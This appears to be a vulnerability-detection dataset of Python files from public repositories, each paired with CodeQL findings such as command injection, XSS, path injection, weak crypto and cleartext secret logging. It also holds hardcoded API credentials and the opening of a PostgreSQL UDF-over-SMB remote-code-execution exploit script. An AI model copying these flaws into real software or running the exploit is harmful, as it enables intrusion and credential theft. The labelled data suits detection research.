"directory_id": "a2029797537515ba87a3e39ce3780d4dce766f36",
"extension": "py",
"fi... | 3.875 | stackv2 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020-02-20 17:04:47
# @Author : ZubinGou (zebgou@gmail.com)
# @Link : https://github.com/ZubinGou
# @Version : $Id$
print('Practice make prefect')
print('You\'d need to \'bout escapes with \\ that do:')
print('\n newlines and \t tabs')
poem = '''
\t the lo... | 36 | 25.75 | 70 | 9 | 297 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_529734a0bbad5dc3_7907d5c7", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
31
] | [
null
] | [
7
] | [
68
] | |
2024-11-18T22:42:15.318035+00:00 | 1,628,862,221,000 | 734ccfb7d8ac33dd7e21c0bafad603045f4be53c | 2 | {
"blob_id": "734ccfb7d8ac33dd7e21c0bafad603045f4be53c",
"branch_name": "refs/heads/master",
"committer_date": 1628862221000,
"content_id": "bedb710a842ddd9f005b710ebe7d7592d1db896c",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "e1c417ad837397cf296310b25217d4287a5b7301",
"extension": "py"... | 2.390625 | stackv2 | ####################################################################
# ### relationship_util.py ###
####################################################################
# ### Author: SAS Institute Inc. ###
#############################################... | 383 | 51.38 | 120 | 26 | 3,510 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_69f8a16a7ec831a4_343407ac", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [networking.k8s.io](1) may be at an arbitrary position ... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The string [networking.k8s.io](1) may be at an arbitrary position in the sanitized URL."
] | [
322
] | [
null
] | [
20
] | [
77
] | |
2024-11-18T20:31:28.023886+00:00 | 1,587,371,256,000 | 8eb597d6b69e107f3712d9545e7c9572d0f39922 | 2 | {
"blob_id": "8eb597d6b69e107f3712d9545e7c9572d0f39922",
"branch_name": "refs/heads/master",
"committer_date": 1587371256000,
"content_id": "472baeb38af20449e97167871269c8aa7c455c78",
"detected_licenses": [
"MIT"
],
"directory_id": "e0ef30a8b0b6caa03fde8284b97ea57a15fb8904",
"extension": "py",
"fi... | 2.453125 | stackv2 | from flask import Flask, render_template, jsonify, request
from random import *
from flask_cors import CORS
from pathlib import Path
import requests
import boto3
import botocore
import os
if not os.path.exists(os.getcwd()+"/model/08_58_Feb_08_2020"):
os.makedirs(os.getcwd()+"/model/08_58_Feb_08_2020")
if not os.pa... | 116 | 34.39 | 126 | 14 | 1,238 | python | [{"finding_id": "codeql_py/reflective-xss_49a9e0144c76581c_ff0b778e", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 2 | true | [
"CWE-079",
"CWE-918"
] | [
"py/reflective-xss",
"py/partial-ssrf"
] | [
"HIGH",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Part of the URL of this request depends on a [user-provided value](1)."
] | [
107,
107
] | [
null,
null
] | [
16,
16
] | [
74,
69
] | |
2024-11-18T20:31:37.371661+00:00 | 1,524,448,325,000 | 5d6924d8ec9cc0e4ccac1f1630f72dc3389b90a0 | 3 | {
"blob_id": "5d6924d8ec9cc0e4ccac1f1630f72dc3389b90a0",
"branch_name": "refs/heads/master",
"committer_date": 1524448325000,
"content_id": "dee96bab0ffdb97094eff1ed9a734dc59e13e8e5",
"detected_licenses": [
"MIT"
],
"directory_id": "921da8004df0ce0858a087e1352d79b2ef178a67",
"extension": "py",
"fi... | 3.109375 | stackv2 | '''
Created on Feb 15, 2016
@author: hanhanwu
The code aims at collecting urls in an indicated academic topics,
academic papers, related news, links will be put into a set of direct_resource
* Get urls from the seed web page, and get urls from each url, how many layers to on depends o the defined depth
* Return:
d... | 114 | 32.75 | 123 | 21 | 945 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_e049f82bd79ba69d_98ad5b0a", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [//dx.doi.org](1) may be at an arbitrary position in th... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The string [//dx.doi.org](1) may be at an arbitrary position in the sanitized URL."
] | [
47
] | [
null
] | [
10
] | [
40
] | |
2024-11-18T20:31:53.048551+00:00 | 1,629,292,122,000 | f74f1ac96e69eaeebc56fdc749b3485ea3d2b7a9 | 2 | {
"blob_id": "f74f1ac96e69eaeebc56fdc749b3485ea3d2b7a9",
"branch_name": "refs/heads/master",
"committer_date": 1629292122000,
"content_id": "6387f20ef1ac81d2cd5b4288c4d6129d50889518",
"detected_licenses": [
"MIT"
],
"directory_id": "4366ae34f1d091f7ed55ddfaa4abeb276a40bbd1",
"extension": "py",
"fi... | 2.46875 | stackv2 | import re
from lxml.html import fromstring
# 删除一个页面中无用的节点
def remove_useless_code(html):
html = re.sub('<style.*?</style ?>', '', html, flags=re.S)
html = re.sub('<script.*?</script ?>', '', html, flags=re.S)
html = re.sub('<video.*?</video ?>', '', html, flags=re.S)
html = re.sub('<iframe.*?</iframe ?... | 28 | 28.71 | 64 | 13 | 216 | python | [{"finding_id": "codeql_py/bad-tag-filter_b06e31f0977d21c8_5104b28b", "tool_name": "codeql", "rule_id": "py/bad-tag-filter", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression does not match upper case <SCRIPT> tags.", "remediation": "", "location": {"file_path": ... | 1 | true | [
"CWE-116"
] | [
"py/bad-tag-filter"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This regular expression does not match upper case <SCRIPT> tags."
] | [
7
] | [
null
] | [
20
] | [
41
] | |
2024-11-18T20:53:37.804608+00:00 | 1,586,963,422,000 | 46644ed403e1d5f6328bf0e3d0050d57f0f03a11 | 2 | {
"blob_id": "46644ed403e1d5f6328bf0e3d0050d57f0f03a11",
"branch_name": "refs/heads/master",
"committer_date": 1586963422000,
"content_id": "f9b00c4c807d6dba40988d1228fff8ab2dd919e9",
"detected_licenses": [
"MIT"
],
"directory_id": "a73b6244f6951342e916f4fcefa3f3b52acd57de",
"extension": "py",
"fi... | 2.3125 | stackv2 | import os, requests, socket
from flask import Flask, session, render_template, url_for, redirect, g, request, redirect, jsonify
from flask_session import Session
from werkzeug.security import generate_password_hash, check_password_hash
from flask_socketio import SocketIO, emit, join_room, leave_room
from models import... | 341 | 38.59 | 146 | 22 | 3,009 | python | [{"finding_id": "codeql_py/url-redirection_e2c3a6242716084b_ce584d8f", "tool_name": "codeql", "rule_id": "py/url-redirection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Untrusted URL redirection depends on a [user-provided value](1).", "remediation": "", "location": {"file_... | 1 | true | [
"CWE-601"
] | [
"py/url-redirection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Untrusted URL redirection depends on a [user-provided value](1)."
] | [
338
] | [
null
] | [
25
] | [
28
] | |
2024-11-18T21:10:22.056282+00:00 | 1,603,797,639,000 | 350cb4133c45160f4180fb28e1f452bfa4424566 | 2 | {
"blob_id": "350cb4133c45160f4180fb28e1f452bfa4424566",
"branch_name": "refs/heads/master",
"committer_date": 1603797639000,
"content_id": "96e19e26d6a7ed3ea812ed17d0b6654dfcf8c9ad",
"detected_licenses": [
"MIT"
],
"directory_id": "3812a65ac03b807e4c9c777d9afe4dd6d7278c55",
"extension": "py",
"fi... | 2.4375 | stackv2 | #!/usr/bin/env python3
import argparse
import paramiko
import threading
import prettytable
import scp
import cmd2
import os
import sys
from datetime import datetime
from tunnels import ForwardTunnel, ReverseTunnel, Tunnel
# TODO
# - Download/Upload to relative path
# - Fix prompts
def print_info(msg):
print ("[*]... | 358 | 29.81 | 137 | 17 | 2,485 | python | [{"finding_id": "codeql_py/paramiko-missing-host-key-validation_02ebecdda6ff2f7c_373db951", "tool_name": "codeql", "rule_id": "py/paramiko-missing-host-key-validation", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Setting missing host key policy to AutoAddPolicy may be unsafe.", "r... | 1 | true | [
"CWE-295"
] | [
"py/paramiko-missing-host-key-validation"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Setting missing host key policy to AutoAddPolicy may be unsafe."
] | [
54
] | [
null
] | [
13
] | [
85
] | |
2024-11-18T21:10:56.279061+00:00 | 1,621,924,656,000 | 36489de05e4b2d738b05d40ba210c1dd18ec4cab | 2 | {
"blob_id": "36489de05e4b2d738b05d40ba210c1dd18ec4cab",
"branch_name": "refs/heads/main",
"committer_date": 1621924656000,
"content_id": "49efe75d501c668fe5af1c9bef745d7fc21e090e",
"detected_licenses": [
"MIT"
],
"directory_id": "3927e911ba668370492bc95a54af2030bf2fa0a8",
"extension": "py",
"file... | 2.4375 | stackv2 | #!/home/kjgong/anaconda3/bin/python3
import time
import os
import sys
import threading
import paramiko
import arrow
# from multiprocessing.dummy import Pool
import queue
from prettytable import PrettyTable
ts = os.get_terminal_size()
if ts.lines < 31:
exit("ERROR:Your terminal size is too small to print this t... | 139 | 30.57 | 168 | 24 | 1,125 | python | [{"finding_id": "codeql_py/paramiko-missing-host-key-validation_850987ea13c81801_a314bfbe", "tool_name": "codeql", "rule_id": "py/paramiko-missing-host-key-validation", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Setting missing host key policy to AutoAddPolicy may be unsafe.", "r... | 1 | true | [
"CWE-295"
] | [
"py/paramiko-missing-host-key-validation"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Setting missing host key policy to AutoAddPolicy may be unsafe."
] | [
27
] | [
null
] | [
9
] | [
74
] | |
2024-11-18T21:47:30.188372+00:00 | 1,514,100,146,000 | c512eec2894a2c18c3c88ebd2b6fae849ce352e8 | 2 | {
"blob_id": "c512eec2894a2c18c3c88ebd2b6fae849ce352e8",
"branch_name": "refs/heads/master",
"committer_date": 1514100146000,
"content_id": "fcd05b979fdc9fa84ca667497a2b3d034453dc86",
"detected_licenses": [
"MIT"
],
"directory_id": "478c31a920a72cf253311c6271ba4cf7b187d35e",
"extension": "py",
"fi... | 2.421875 | stackv2 | #!/usr/bin/env python
import subprocess
from flask import Flask
from flask import request
import requests
import time
import threading
app = Flask(__name__)
from scenarios import *
kill_container_after = 5 #sec
# e.g. /GET/cli/python/docker/1337
@app.route('/GET/<reqtype>/<platform>/<cont>/<int:inp>', methods=['GET'... | 95 | 34.14 | 126 | 14 | 847 | python | [{"finding_id": "codeql_py/command-line-injection_e399677512770ef4_3db0fbb2", "tool_name": "codeql", "rule_id": "py/command-line-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This command line depends on a [user-provided value](1).", "remediation": "", "location": {... | 4 | true | [
"CWE-078",
"CWE-215",
"CWE-079",
"CWE-918"
] | [
"py/command-line-injection",
"py/flask-debug",
"py/reflective-xss",
"py/partial-ssrf"
] | [
"HIGH",
"HIGH",
"HIGH",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This command line depends on a [user-provided value](1).",
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"Part of the URL of this request depends on a [user-provid... | [
58,
95,
35,
47
] | [
null,
null,
null,
null
] | [
36,
3,
10,
11
] | [
74,
57,
20,
28
] | |
2024-11-18T21:47:41.669850+00:00 | 1,418,128,465,000 | a4a7721064ffe2ab122918a2bff8d00007956b5d | 2 | {
"blob_id": "a4a7721064ffe2ab122918a2bff8d00007956b5d",
"branch_name": "refs/heads/master",
"committer_date": 1418128465000,
"content_id": "19bad5bacbc57dfa686934fe5b863e32d9304991",
"detected_licenses": [
"MIT"
],
"directory_id": "32264e604d785b6c111628ee1203351f7dde21b9",
"extension": "py",
"fi... | 2.5 | stackv2 | # -*- coding : utf-8 -*-
# from __future__ import unicode_literals
import os
import re
import urllib2, urllib
def get_env_login_pass():
try:
login = os.environ['EPOCHTA_LOGIN']
except KeyError:
raise Exception('NOT SET EPOCHTA_LOGIN')
try:
password = os.environ['EPOCHTA_PASS']
... | 249 | 33.76 | 131 | 17 | 1,779 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_54265ffb6b81cdb5_5306b1b4", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text.",
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (p... | [
227,
238
] | [
null,
null
] | [
20,
19
] | [
56,
58
] | |
2024-11-18T22:28:47.694332+00:00 | 1,342,543,638,000 | b6a392bcfacf2ae20c81cf11657dd23845b1fe00 | 3 | {
"blob_id": "b6a392bcfacf2ae20c81cf11657dd23845b1fe00",
"branch_name": "refs/heads/master",
"committer_date": 1342543638000,
"content_id": "27f363b4af35e22f4a9ffbfa5dedbd79fe42bb6d",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "d5464985c22c0ea937929d18d1599f4d369ffbf0",
"extension": "p... | 2.6875 | stackv2 |
from django import forms
from django.db import models
from django.conf import settings
from django.utils.encoding import smart_str
import os
from base64 import b64decode, b64encode
from Crypto.Cipher import ARC4
class EncryptedCharField(models.TextField):
"""A field that stores short text data in an encrypted forma... | 50 | 29.86 | 87 | 17 | 404 | python | [{"finding_id": "codeql_py/weak-cryptographic-algorithm_2e95b6df9f3fca02_38b82df6", "tool_name": "codeql", "rule_id": "py/weak-cryptographic-algorithm", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "[The cryptographic algorithm ARC4](1) is broken or weak, and should not be used.", "... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/weak-cryptographic-algorithm",
"py/weak-cryptographic-algorithm"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"[The cryptographic algorithm ARC4](1) is broken or weak, and should not be used.",
"[The cryptographic algorithm ARC4](1) is broken or weak, and should not be used."
] | [
26,
32
] | [
null,
null
] | [
48,
15
] | [
73,
41
] | |
2024-11-18T22:28:50.101766+00:00 | 1,508,016,981,000 | 60c563ba2b68fc7cdaf11857e4ce3d6c6ae31929 | 3 | {
"blob_id": "60c563ba2b68fc7cdaf11857e4ce3d6c6ae31929",
"branch_name": "refs/heads/master",
"committer_date": 1508016981000,
"content_id": "899bc3d9b08d2d4d3f4187ef1c13f0fe16afbd55",
"detected_licenses": [
"MIT"
],
"directory_id": "193166da5e5a663a5169c8cdadcea493bca9d815",
"extension": "py",
"fi... | 3.0625 | stackv2 | #!/usr/bin/python
import os
import platform
import urllib
import zipfile
class Requirement:
osName = platform.system()
platform = 'amd64'
installDir = '/usr/local/bin/'
def __init__(self, fileName):
self.fileName = fileName
print "\n Starting installing dependencies..."
def openF... | 68 | 26.34 | 57 | 21 | 406 | python | [{"finding_id": "codeql_py/overly-permissive-file_2ab278826c14a660_eaf60394", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ... | 1 | true | [
"CWE-732"
] | [
"py/overly-permissive-file"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world writable."
] | [
50
] | [
null
] | [
13
] | [
50
] | |
2024-11-18T22:28:59.996172+00:00 | 1,483,979,061,000 | 2ad6468074565b83d267fadbe3d89f8bc09f66a5 | 3 | {
"blob_id": "2ad6468074565b83d267fadbe3d89f8bc09f66a5",
"branch_name": "refs/heads/master",
"committer_date": 1483979061000,
"content_id": "878e7e3e0697006d2cb521da0701ac1c4b74015f",
"detected_licenses": [
"MIT"
],
"directory_id": "01704451cef195cc5c4e76351942aed69e877042",
"extension": "py",
"fi... | 2.796875 | stackv2 | # MIT License
# Copyright (c) 2016 Clive Cadogan
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, ... | 235 | 31.45 | 83 | 15 | 1,668 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_d0c1e0ac83a7247d_af3643b9", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function."
] | [
46
] | [
null
] | [
27
] | [
43
] | |
2024-11-18T22:29:01.219275+00:00 | 1,582,199,513,000 | 235152d190c077567fbb9da5afa061a15ea1adb0 | 2 | {
"blob_id": "235152d190c077567fbb9da5afa061a15ea1adb0",
"branch_name": "refs/heads/master",
"committer_date": 1582199513000,
"content_id": "76197765617ff2dd96bc1d2ff1af0b2a3b75ff7a",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"directory_id": "c6f0e167a8ed00c96168dc2ab3eacf36c7b6d8c3",
"exten... | 2.34375 | stackv2 | import os
import subprocess
import sys
import glob
import base64
import json
with sys.stdin as f:
code = f.read()
if code == '':
exit(0)
shellscript_filename = '/task.sh'
# create script file
with open(shellscript_filename, 'w') as f:
f.write(code)
# chmod +x
current_permit = os.stat(shellscript_filena... | 38 | 24.74 | 120 | 11 | 261 | python | [{"finding_id": "codeql_py/overly-permissive-file_66587f4c0974cbe5_b21b7274", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world writable.", "remediation": "", "location": ... | 1 | true | [
"CWE-732"
] | [
"py/overly-permissive-file"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Overly permissive mask in chmod sets file to world writable."
] | [
22
] | [
null
] | [
null
] | [
36
] | |
2024-11-18T22:29:21.552833+00:00 | 1,610,287,687,000 | ae93f9dca249082b0a03123a05edd18d82c49ee1 | 3 | {
"blob_id": "ae93f9dca249082b0a03123a05edd18d82c49ee1",
"branch_name": "refs/heads/master",
"committer_date": 1610287687000,
"content_id": "97bbda4d650cdb6b4fb3f32a29f61a0c98eab92a",
"detected_licenses": [
"MIT"
],
"directory_id": "88baa949f65a25cb12c67c8750145bd0b833406f",
"extension": "py",
"fi... | 2.796875 | stackv2 | from collections import OrderedDict
from copy import deepcopy
from pathlib import Path
import xmltodict
from PIL import Image
from horch.datasets.voc import TEST_DATASET_YEAR_DICT, DATASET_YEAR_DICT, VOC_CATEGORIES, VOC_CATEGORY_TO_IDX
from torch.utils.data import Dataset
from torchvision.datasets.utils import downloa... | 177 | 33.5 | 113 | 16 | 1,415 | python | [{"finding_id": "codeql_py/tarslip_6a3418b607b227ab_0dbd8e91", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un... | 1 | true | [
"CWE-022"
] | [
"py/tarslip"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This file extraction depends on a [potentially untrusted source](1)."
] | [
140
] | [
null
] | [
13
] | [
16
] | |
2024-11-18T22:29:26.114812+00:00 | 1,590,928,183,000 | 3e12ade81b36fbebafeabc5258880b1d1c2bd6aa | 2 | {
"blob_id": "3e12ade81b36fbebafeabc5258880b1d1c2bd6aa",
"branch_name": "refs/heads/master",
"committer_date": 1590928183000,
"content_id": "f6cb5fe7b6a8aff57c5ba0e6d10d2e73e1851e2e",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "b40c4c8478c86a8b1ac792429a385523d9e27f77",
"extension": "py"... | 2.375 | stackv2 | #!/usr/bin/python
# -*- coding: utf-8 --
#@File: WxService.py
#@author: Gorit
#@contact: gorit@qq.com
#@time: 2020/3/4 0:13
import time
import requests,json
__APPID = "wx1c1862f2b751664f"
__APPSECRET = "79c893f62a9a35f9ca427b7d8fbbe4da"
__GET_ACCESS_TOKEN = f"https://api.weixin.qq.com/cgi-bin/token?grant_type=client_c... | 91 | 23.6 | 129 | 13 | 690 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_2cca346a2c6582e4_c92e4032", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 2 | true | [
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
31,
85
] | [
null,
null
] | [
15,
15
] | [
23,
25
] | |
2024-11-18T22:29:32.199998+00:00 | 1,475,530,990,000 | e919ffbb7cdeab9023dcc92873bc5f42c74447cb | 2 | {
"blob_id": "e919ffbb7cdeab9023dcc92873bc5f42c74447cb",
"branch_name": "refs/heads/master",
"committer_date": 1475530990000,
"content_id": "a46ba03d3d7f9f2863dcaf434a05a4fa3459ed92",
"detected_licenses": [
"MIT"
],
"directory_id": "9b68913c89825e8c603bcae3cf3fa369c82a97a6",
"extension": "py",
"fi... | 2.375 | stackv2 | """
EmbedVideos XBlock enables users to post from various providers
with various parameters on a single XBlock.
"""
import pkg_resources
from xblock.core import XBlock
from xblock.fields import Scope, Integer, String
from xblock.fragment import Fragment
from jinja2 import Environment, PackageLoader
env = Environment... | 197 | 40.52 | 109 | 16 | 1,777 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_7c831e425630bb9c_cd040ae3", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
13
] | [
null
] | [
7
] | [
70
] | |
2024-11-18T22:40:32.810673+00:00 | 1,611,840,207,000 | 2e81efeb3303f43b9c16d621ec1d410c2c9ce30d | 3 | {
"blob_id": "2e81efeb3303f43b9c16d621ec1d410c2c9ce30d",
"branch_name": "refs/heads/master",
"committer_date": 1611840207000,
"content_id": "e9f2820d61eff0aaea62ef0e2fa62005c0f26591",
"detected_licenses": [
"MIT"
],
"directory_id": "79f81fbb0b902a7cf3f2f2b91643c1b77351d2c9",
"extension": "py",
"fi... | 2.671875 | stackv2 | import os
import json
from typing import List
import logging
import flask
import yake
import numpy as np
import spacy
from tqdm import tqdm
from pymongo import MongoClient
from flask_jwt_extended import JWTManager, jwt_required, create_access_token
from flask import request, jsonify
from flask_bcrypt import Bcrypt
fro... | 484 | 27.98 | 125 | 20 | 3,429 | python | [{"finding_id": "codeql_py/flask-debug_4cac55dd370e55a3_2b8cda4b", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ... | 4 | true | [
"CWE-215",
"CWE-022",
"CWE-022",
"CWE-022"
] | [
"py/flask-debug",
"py/path-injection",
"py/path-injection",
"py/path-injection"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.",
"This path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1)."
] | [
483,
73,
352,
364
] | [
null,
null,
null,
null
] | [
5,
30,
19,
17
] | [
49,
34,
70,
44
] | |
2024-11-18T22:40:36.904368+00:00 | 1,637,262,381,000 | 3464271cf33aea6a889e83834cafc480bf7d6548 | 2 | {
"blob_id": "3464271cf33aea6a889e83834cafc480bf7d6548",
"branch_name": "refs/heads/main",
"committer_date": 1637262381000,
"content_id": "0813d7c2294e3c9b7c0f3b2b5bc8b00db902b516",
"detected_licenses": [
"MIT"
],
"directory_id": "4d29a2355c0580c7fca19c446111a037743fe42a",
"extension": "py",
"file... | 2.375 | stackv2 | # (m4ud) PostgreSQL Windows UDF DLL over SMB RCE
import requests, sys
requests.packages.urllib3.disable_warnings()
def log(msg):
print msg
def make_request(url, sql):
log("[*] Executing query: %s" % sql[0:80])
r = requests.get( url % sql, verify=False)
return r
def create_udf_func(url):
lo... | 38 | 28.37 | 167 | 12 | 329 | python | [{"finding_id": "codeql_py/request-without-cert-validation_384c2ede15a6eb06_d5ddef3b", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
12
] | [
null
] | [
9
] | [
47
] | |
2024-11-18T22:41:05.415649+00:00 | 1,620,848,868,000 | c4d38382d8a59b338e088e641ae2367b62cdedff | 3 | {
"blob_id": "c4d38382d8a59b338e088e641ae2367b62cdedff",
"branch_name": "refs/heads/master",
"committer_date": 1620848868000,
"content_id": "838e0fcf65cb6e0c8af9af853f2dd9101e5519b9",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "a39ad7f40cb8102246b6a56769936281edce1818",
"extension": "p... | 2.90625 | stackv2 | """
LSTM (Long Short Term Memory) Autoencoder
Explored as a substitute for the convolutional autoencoder
"""
import tensorflow
from tensorflow import keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout, RepeatVector, TimeDistributed
import numpy as np
import os... | 202 | 35.43 | 127 | 15 | 1,851 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0ac32e7151e58331_e99ff0ac", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh... | 3 | true | [
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.\nThis expression logs [sensitive data (private)](3) as clear text.",
"This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (priva... | [
66,
147,
150
] | [
null,
null,
null
] | [
11,
19,
19
] | [
58,
76,
105
] | |
2024-11-18T22:54:06.315720+00:00 | 1,651,095,228,000 | 023c1ecfb079a6a2eead9333dffa6ddde8dd615e | 3 | {
"blob_id": "023c1ecfb079a6a2eead9333dffa6ddde8dd615e",
"branch_name": "refs/heads/master",
"committer_date": 1651095228000,
"content_id": "28142d056da0b22257c26f9ea4c4a9662bd3dad4",
"detected_licenses": [
"MIT"
],
"directory_id": "4e603fed251ff664043c8a9cc4eb9c6345015fb7",
"extension": "py",
"fi... | 2.59375 | stackv2 | #!/usr/bin/env python3
#pip install elasticsearch==7.13.0 elasticsearch-dsl
import requests, json, argparse, elasticsearch, re, os, sys
from bs4 import BeautifulSoup
from elasticsearch import Elasticsearch
output = 'completed.txt'
parser = argparse.ArgumentParser()
parser.add_argument('--file', required=True)
parser.... | 150 | 29.18 | 176 | 26 | 1,087 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_e285b4a919fd04a3_bb01f968", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [insearchofannwalker.com](1) may be at an arbitrary pos... | 3 | true | [
"CWE-020",
"CWE-020",
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization",
"py/incomplete-url-substring-sanitization",
"py/incomplete-url-substring-sanitization"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"The string [insearchofannwalker.com](1) may be at an arbitrary position in the sanitized URL.",
"The string [drive.google.com](1) may be at an arbitrary position in the sanitized URL.",
"The string [annelisternorway.com](1) may be at an arbitrary position in the sanitized URL."
] | [
121,
123,
125
] | [
null,
null,
null
] | [
26,
26,
26
] | [
68,
61,
65
] | |
